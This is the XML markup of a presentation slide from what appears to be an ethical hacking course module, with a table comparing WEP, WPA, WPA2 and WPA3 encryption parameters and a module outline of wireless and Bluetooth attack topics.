                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="90535" marT="46177" marB="46177" anchor="ctr" horzOverflow="overflow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64376">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/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700" b="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline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</a:rPr>
                        <a:t>Encryption Algorithm</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1700" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline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700" b="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline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</a:rPr>
                        <a:t>IV Size</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1700" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline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700" b="1" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline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</a:rPr>
                        <a:t>Encryption Key Length</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1700" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline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700" b="1" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline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</a:rPr>
                        <a:t>Key Management</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1700" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline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700" b="1" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline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</a:rPr>
                        <a:t>Integrity Check Mechanism</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1700" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline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404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600" b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WEP</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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600" b="1" u="none" strike="noStrike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</a:rPr>
                        <a:t>RC4</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000099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600" b="1" u="none" strike="noStrike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</a:rPr>
                        <a:t>24-bits</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000099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600" b="1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</a:rPr>
                        <a:t>40/104-bits</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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99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600" b="1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</a:rPr>
                        <a:t>None</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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99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600" b="1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</a:rPr>
                        <a:t>CRC-32</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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99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240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600" b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WPA</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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600" b="1" u="none" strike="noStrike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</a:rPr>
                        <a:t>RC4, TKIP</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000099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600" b="1" u="none" strike="noStrike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</a:rPr>
                        <a:t>48-bits</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000099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600" b="1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</a:rPr>
                        <a:t>128-bits</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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99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600" b="1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</a:rPr>
                        <a:t>4-way handshake</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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99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600" b="1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</a:rPr>
                        <a:t>Michael algorithm and CRC-32</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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99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600" b="1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WPA2</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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600" b="1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</a:rPr>
                        <a:t>AES-CCMP</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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99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600" b="1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</a:rPr>
                        <a:t>48-bits</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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99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600" b="1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</a:rPr>
                        <a:t>128-bits</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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99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600" b="1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</a:rPr>
                        <a:t>4-way handshake</a:t>
                      </a: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600" b="1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</a:rPr>
                        <a:t>CBC-MAC</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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99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350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600" b="1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WPA3</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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600" b="1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AES-GCMP 256</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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600" b="1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Arbitrary </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="1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length 1 - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-IN" sz="1600" b="1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 2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-IN" sz="1600" b="1" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="3000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64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="1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 </a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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600" b="1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192-bits</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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600" b="1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ECDH and ECDSA</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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600" b="1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BIP-GMAC-256</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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135337" marR="135337" marT="70375" marB="70375" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="421362629"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Group 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EC18680-4C16-46CE-B187-1CD8463DB6BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1206500" y="4991100"/>
          <a:ext cx="7797800" cy="1415866"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"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tableStyleId>{00A15C55-8517-42AA-B614-E9B94910E393}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="20050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927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4777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600" b="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline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</a:rPr>
                        <a:t>  WEP, WPA</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline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latin typeface="Arial" charset="0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90000" marR="90000" marT="46800" marB="468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1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline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</a:rPr>
                        <a:t>Should be replaced with more secure WPA and WPA2</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline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latin typeface="+mj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90000" marR="90000" marT="46800" marB="46800" anchor="ctr" horzOverflow="overflow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4777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600" b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          WPA2</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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90000" marR="90000" marT="46800" marB="468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4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Incorporates protection against forgery and replay attacks</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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90000" marR="90000" marT="46800" marB="46800" anchor="ctr" horzOverflow="overflow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261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600" b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WPA3</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="16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90000" marR="90000" marT="46800" marB="468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4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</a:rPr>
                        <a:t>Provides enhanced password protection and secured IoT connections; encompasses stronger encryption techniques</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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-윤고딕140" pitchFamily="18" charset="-127"/>
                        <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="90000" marT="46800" marB="46800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593150626"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="Z:\CEH v7 - Haja\Haja Premium Icons\Check Marks\Check13-small.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AF2902C-4199-4350-BA8B-EFA7C6E337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12633" y="5459103"/>
            <a:ext cx="418523" cy="432474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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3" descr="Z:\CEH v7 - Haja\Haja Premium Icons\Check Marks\Cross1.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{457D2F33-D9EC-48FF-968A-550B9E37AE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13381" y="4993949"/>
            <a:ext cx="417026" cy="431185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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Picture 2" descr="Z:\CEH v7 - Haja\Haja Premium Icons\Check Marks\Check13-small.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9E26844-C757-4BAE-84F6-FD43B9E463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11884" y="5947298"/>
            <a:ext cx="418523" cy="432474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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0566410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Rectangle 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492F9220-FD9E-489E-AF7E-DBE5DD5CF61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="485588" y="3120901"/>
            <a:ext cx="3934701" cy="99433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>
            <a:scene3d>
              <a:camera prst="perspectiveAbove"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene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4523584" y="221787"/>
            <a:ext cx="3144836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rPr>
              <a:t>Module Flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1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81" name="Oval 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3632813" y="3354600"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="38100"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8" name="Oval 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2877160" y="4885888"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="3810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9" name="Oval 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900848" y="2514600"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
          <a:ln w="381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" name="Oval 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8782072" y="4207543"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="381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B9016AFD-5B5A-4813-A53E-5D4C3615CEC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578635" y="2476299"/>
            <a:ext cx="2897085" cy="69403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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Different Types of Wireless Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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B14C850-384D-43ED-A074-9D81FF2B7B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9430979" y="4194087"/>
            <a:ext cx="2532421" cy="69403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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understand Bluetooth Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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4F181BEB-E04A-42A9-9AC7-2704A1A580BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="496386" y="3264450"/>
            <a:ext cx="3083372" cy="69403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 algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Wireless Network-Specific Attack Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403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178D3AB4-6CCD-4627-81A0-952F323A0B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1942730" y="1637194"/>
            <a:ext cx="2418764" cy="61555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 algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understand Wireless Terminology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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</a:endParaRPr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7CEA977D-F9E3-49EA-AA26-D48AC44B87B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4414470" y="1669051"/>
            <a:ext cx="551839" cy="551839"/>
            <a:chOff x="4150833" y="1613610"/>
            <a:chExt cx="551839" cy="551839"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="106" name="Oval 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4150833" y="1613610"/>
              <a:ext cx="551839" cy="551839"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln w="38100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" name="Freeform 167">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86753C4D-EE69-4971-84FE-58F31E5B7B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82955" y="1737961"/>
              <a:ext cx="285358" cy="296356"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198438 w 58"/>
                <a:gd name="T1" fmla="*/ 162089 h 58"/>
                <a:gd name="T2" fmla="*/ 160803 w 58"/>
                <a:gd name="T3" fmla="*/ 200025 h 58"/>
                <a:gd name="T4" fmla="*/ 37635 w 58"/>
                <a:gd name="T5" fmla="*/ 200025 h 58"/>
                <a:gd name="T6" fmla="*/ 0 w 58"/>
                <a:gd name="T7" fmla="*/ 162089 h 58"/>
                <a:gd name="T8" fmla="*/ 0 w 58"/>
                <a:gd name="T9" fmla="*/ 34487 h 58"/>
                <a:gd name="T10" fmla="*/ 37635 w 58"/>
                <a:gd name="T11" fmla="*/ 0 h 58"/>
                <a:gd name="T12" fmla="*/ 160803 w 58"/>
                <a:gd name="T13" fmla="*/ 0 h 58"/>
                <a:gd name="T14" fmla="*/ 198438 w 58"/>
                <a:gd name="T15" fmla="*/ 34487 h 58"/>
                <a:gd name="T16" fmla="*/ 198438 w 58"/>
                <a:gd name="T17" fmla="*/ 162089 h 58"/>
                <a:gd name="T18" fmla="*/ 167646 w 58"/>
                <a:gd name="T19" fmla="*/ 72423 h 58"/>
                <a:gd name="T20" fmla="*/ 167646 w 58"/>
                <a:gd name="T21" fmla="*/ 58628 h 58"/>
                <a:gd name="T22" fmla="*/ 153961 w 58"/>
                <a:gd name="T23" fmla="*/ 44833 h 58"/>
                <a:gd name="T24" fmla="*/ 143696 w 58"/>
                <a:gd name="T25" fmla="*/ 44833 h 58"/>
                <a:gd name="T26" fmla="*/ 82112 w 58"/>
                <a:gd name="T27" fmla="*/ 106910 h 58"/>
                <a:gd name="T28" fmla="*/ 54742 w 58"/>
                <a:gd name="T29" fmla="*/ 79320 h 58"/>
                <a:gd name="T30" fmla="*/ 44477 w 58"/>
                <a:gd name="T31" fmla="*/ 79320 h 58"/>
                <a:gd name="T32" fmla="*/ 30792 w 58"/>
                <a:gd name="T33" fmla="*/ 93115 h 58"/>
                <a:gd name="T34" fmla="*/ 30792 w 58"/>
                <a:gd name="T35" fmla="*/ 103461 h 58"/>
                <a:gd name="T36" fmla="*/ 75270 w 58"/>
                <a:gd name="T37" fmla="*/ 151743 h 58"/>
                <a:gd name="T38" fmla="*/ 88955 w 58"/>
                <a:gd name="T39" fmla="*/ 151743 h 58"/>
                <a:gd name="T40" fmla="*/ 167646 w 58"/>
                <a:gd name="T41" fmla="*/ 72423 h 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8" h="58">
                  <a:moveTo>
                    <a:pt x="58" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="53"/>
                    <a:pt x="53" y="58"/>
                    <a:pt x="47" y="58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5" y="58"/>
                    <a:pt x="0" y="53"/>
                    <a:pt x="0" y="4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53" y="0"/>
                    <a:pt x="58" y="4"/>
                    <a:pt x="58" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="58" y="47"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="20"/>
                    <a:pt x="50" y="18"/>
                    <a:pt x="49" y="17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4" y="12"/>
                    <a:pt x="43" y="12"/>
                    <a:pt x="42" y="13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4" y="22"/>
                    <a:pt x="13" y="23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8"/>
                    <a:pt x="8" y="29"/>
                    <a:pt x="9" y="30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3" y="45"/>
                    <a:pt x="25" y="45"/>
                    <a:pt x="26" y="44"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="49" y="2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/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Freeform 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D00080F5-AB70-4A18-96ED-06D761FEA3B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3729092" y="3468970"/>
            <a:ext cx="354131" cy="303951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 142082 w 178"/>
              <a:gd name="T1" fmla="*/ 0 h 168"/>
              <a:gd name="T2" fmla="*/ 284163 w 178"/>
              <a:gd name="T3" fmla="*/ 60684 h 168"/>
              <a:gd name="T4" fmla="*/ 260217 w 178"/>
              <a:gd name="T5" fmla="*/ 91026 h 168"/>
              <a:gd name="T6" fmla="*/ 142082 w 178"/>
              <a:gd name="T7" fmla="*/ 38327 h 168"/>
              <a:gd name="T8" fmla="*/ 23946 w 178"/>
              <a:gd name="T9" fmla="*/ 91026 h 168"/>
              <a:gd name="T10" fmla="*/ 0 w 178"/>
              <a:gd name="T11" fmla="*/ 60684 h 168"/>
              <a:gd name="T12" fmla="*/ 142082 w 178"/>
              <a:gd name="T13" fmla="*/ 0 h 168"/>
              <a:gd name="T14" fmla="*/ 142082 w 178"/>
              <a:gd name="T15" fmla="*/ 95817 h 168"/>
              <a:gd name="T16" fmla="*/ 225095 w 178"/>
              <a:gd name="T17" fmla="*/ 138934 h 168"/>
              <a:gd name="T18" fmla="*/ 204342 w 178"/>
              <a:gd name="T19" fmla="*/ 166082 h 168"/>
              <a:gd name="T20" fmla="*/ 142082 w 178"/>
              <a:gd name="T21" fmla="*/ 134144 h 168"/>
              <a:gd name="T22" fmla="*/ 79821 w 178"/>
              <a:gd name="T23" fmla="*/ 166082 h 168"/>
              <a:gd name="T24" fmla="*/ 59068 w 178"/>
              <a:gd name="T25" fmla="*/ 138934 h 168"/>
              <a:gd name="T26" fmla="*/ 142082 w 178"/>
              <a:gd name="T27" fmla="*/ 95817 h 168"/>
              <a:gd name="T28" fmla="*/ 142082 w 178"/>
              <a:gd name="T29" fmla="*/ 191634 h 168"/>
              <a:gd name="T30" fmla="*/ 180396 w 178"/>
              <a:gd name="T31" fmla="*/ 229960 h 168"/>
              <a:gd name="T32" fmla="*/ 142082 w 178"/>
              <a:gd name="T33" fmla="*/ 268287 h 168"/>
              <a:gd name="T34" fmla="*/ 103767 w 178"/>
              <a:gd name="T35" fmla="*/ 229960 h 168"/>
              <a:gd name="T36" fmla="*/ 142082 w 178"/>
              <a:gd name="T37" fmla="*/ 191634 h 16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78" h="168">
                <a:moveTo>
                  <a:pt x="89" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="0"/>
                  <a:pt x="156" y="15"/>
                  <a:pt x="178" y="38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45" y="37"/>
                  <a:pt x="119" y="24"/>
                  <a:pt x="89" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="24"/>
                  <a:pt x="33" y="37"/>
                  <a:pt x="15" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="38"/>
                  <a:pt x="0" y="38"/>
                  <a:pt x="0" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="15"/>
                  <a:pt x="54" y="0"/>
                  <a:pt x="89" y="0"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="89" y="60"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="60"/>
                  <a:pt x="129" y="71"/>
                  <a:pt x="141" y="87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19" y="92"/>
                  <a:pt x="105" y="84"/>
                  <a:pt x="89" y="84"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="84"/>
                  <a:pt x="59" y="92"/>
                  <a:pt x="50" y="104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="87"/>
                  <a:pt x="37" y="87"/>
                  <a:pt x="37" y="87"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="71"/>
                  <a:pt x="68" y="60"/>
                  <a:pt x="89" y="60"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="89" y="120"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="102" y="120"/>
                  <a:pt x="113" y="131"/>
                  <a:pt x="113" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="157"/>
                  <a:pt x="102" y="168"/>
                  <a:pt x="89" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="168"/>
                  <a:pt x="65" y="157"/>
                  <a:pt x="65" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="131"/>
                  <a:pt x="76" y="120"/>
                  <a:pt x="89" y="120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09" name="Freeform 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EEA836F-6FC0-4F24-B06E-5ADA0E3ACA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281" y="5000730"/>
            <a:ext cx="291473" cy="313875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 51370 w 462"/>
              <a:gd name="T1" fmla="*/ 67883 h 452"/>
              <a:gd name="T2" fmla="*/ 83086 w 462"/>
              <a:gd name="T3" fmla="*/ 43607 h 452"/>
              <a:gd name="T4" fmla="*/ 83086 w 462"/>
              <a:gd name="T5" fmla="*/ 31469 h 452"/>
              <a:gd name="T6" fmla="*/ 19655 w 462"/>
              <a:gd name="T7" fmla="*/ 39561 h 452"/>
              <a:gd name="T8" fmla="*/ 51370 w 462"/>
              <a:gd name="T9" fmla="*/ 67883 h 452"/>
              <a:gd name="T10" fmla="*/ 27695 w 462"/>
              <a:gd name="T11" fmla="*/ 87664 h 452"/>
              <a:gd name="T12" fmla="*/ 11614 w 462"/>
              <a:gd name="T13" fmla="*/ 55745 h 452"/>
              <a:gd name="T14" fmla="*/ 15634 w 462"/>
              <a:gd name="T15" fmla="*/ 151051 h 452"/>
              <a:gd name="T16" fmla="*/ 27695 w 462"/>
